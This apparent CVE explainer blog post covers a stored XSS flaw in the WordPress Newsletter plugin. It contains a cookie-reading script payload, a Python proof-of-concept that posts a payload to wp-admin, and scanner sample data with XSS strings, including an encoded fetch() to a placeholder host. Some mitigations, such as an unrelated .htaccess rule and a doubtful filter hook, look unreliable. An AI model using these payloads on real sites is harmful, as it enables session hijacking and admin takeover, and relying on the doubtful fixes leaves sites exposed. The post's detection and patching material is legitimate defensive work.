How CVE-2025-3582 Works
The Newsletter plugin (before v8.85) for WordPress fails to sanitize and escape form settings, allowing admins to inject malicious JavaScript payloads. Even when `unfiltered_html` is disabled (e.g., in multisite configurations), high-privileged users can store XSS attacks in form fields. When other users access the compromised form, the script executes in their browser, potentially leading to session hijacking or admin takeover.
DailyCVE Form:
Platform: WordPress
Version: <8.85
Vulnerability: Stored XSS
Severity: High
Date: 2025-06-12
Prediction: Patch by 2025-07-10
What Undercode Say:
Exploitation:
1. Payload Injection:

```html
<script>alert(document.cookie)</script>
```

Inserted into form settings via admin panel.

2. Trigger: Victims loading the modified form execute the payload.
Detection:
```bash
wpscan --url TARGET --plugins newsletter --api-token YOUR_API_KEY
```
Mitigation:
1. Temporary Fix:

```php
add_filter('the_newsletter_form_settings', 'esc_attr');
```

Add to `functions.php`.

2. Permanent Fix:

```bash
wp plugin update newsletter --version=8.85
```

3. .htaccess Rule:

```apache
<Files "newsletter.php">
    php_flag allow_url_fopen Off
</Files>
```
Log Analysis:
```sql
-- Select the columns explicitly; the original query omitted the column list
SELECT option_name, option_value
FROM wp_options
WHERE option_name LIKE '%newsletter%'
  AND option_value LIKE '%<script>%';
```
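The SQL above only catches a literal, lowercase `<script>` string. Stored payloads in `wp_options` are usually wrapped in PHP-serialized arrays and may be mixed-case, entity-encoded, or use an event-handler attribute instead of a script tag. The following scanner, added here as an example and not part of the original post or the Newsletter plugin, runs the same check over exported rows with those cases handled; the sample rows and option names are constructed for illustration.

```python
import html
import re

# Constructed sample rows in the (option_name, option_value) shape of wp_options.
# Values mimic the PHP-serialized arrays WordPress stores for plugin settings.
SAMPLE_ROWS = [
    ("newsletter_forms", 'a:1:{s:5:"title";s:10:"Subscribe!";}'),
    ("newsletter_main", 'a:1:{s:6:"footer";s:39:"<script>alert(document.cookie)</script>";}'),
    ("newsletter_profile", 'a:1:{s:4:"html";s:28:"<img src=x onerror=alert(1)>";}'),
    ("newsletter_list", '&lt;ScRiPt&gt;fetch(&quot;https://example.invalid&quot;)&lt;/ScRiPt&gt;'),
    ("siteurl", "https://example.invalid"),
]

# Indicators of stored script content; all matched case-insensitively.
PATTERNS = [
    ("script_tag", re.compile(r"<\s*script\b", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),
    ("iframe_tag", re.compile(r"<\s*iframe\b", re.I)),
]


def normalize(value: str) -> str:
    """Decode HTML entities until the text stops changing (payloads may be
    double-encoded), capped at a few rounds to bound the work."""
    prev = None
    cur = value
    for _ in range(3):
        cur = html.unescape(cur)
        if cur == prev:
            break
        prev = cur
    return cur


def scan_option(name: str, value: str) -> list:
    """Return the list of indicator labels found in one option value."""
    text = normalize(value)
    return [label for label, rx in PATTERNS if rx.search(text)]


def scan_options(rows, name_filter="newsletter") -> list:
    """Scan rows and return (option_name, [labels]) for every suspicious row.
    name_filter restricts the scan to plugin options, mirroring the SQL LIKE."""
    findings = []
    for name, value in rows:
        if name_filter and name_filter not in name:
            continue
        hits = scan_option(name, value)
        if hits:
            findings.append((name, hits))
    return findings


if __name__ == "__main__":
    for name, hits in scan_options(SAMPLE_ROWS):
        print(f"{name}: {', '.join(hits)}")
```

Feed it the output of the SELECT above (or `wp option list --search='newsletter*'`) rather than the constructed rows to check a real site; a hit is a reason to inspect the option, not proof of compromise, since legitimate templates can contain inline scripts.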
Patch Analysis:
The update introduces:

```php
$form_settings = wp_kses_post($_POST['form_settings']);
```
Exploit Simulation (PoC):
```python
import requests

# Placeholder: an authenticated admin session cookie is required, as the
# original PoC assumed but did not define.
ADMIN_COOKIE = {"wordpress_logged_in": "PLACEHOLDER"}

wp_admin = "http://target/wp-admin/post.php"
payload = {"form_settings": "<script>exploit()</script>"}
requests.post(wp_admin, data=payload, cookies=ADMIN_COOKIE)
```
References:
- WPScan Advisory: WPScan-CVE-2025-3582
- NVD Entry: CVE-2025-3582
Sources:
Reported By: nvd.nist.gov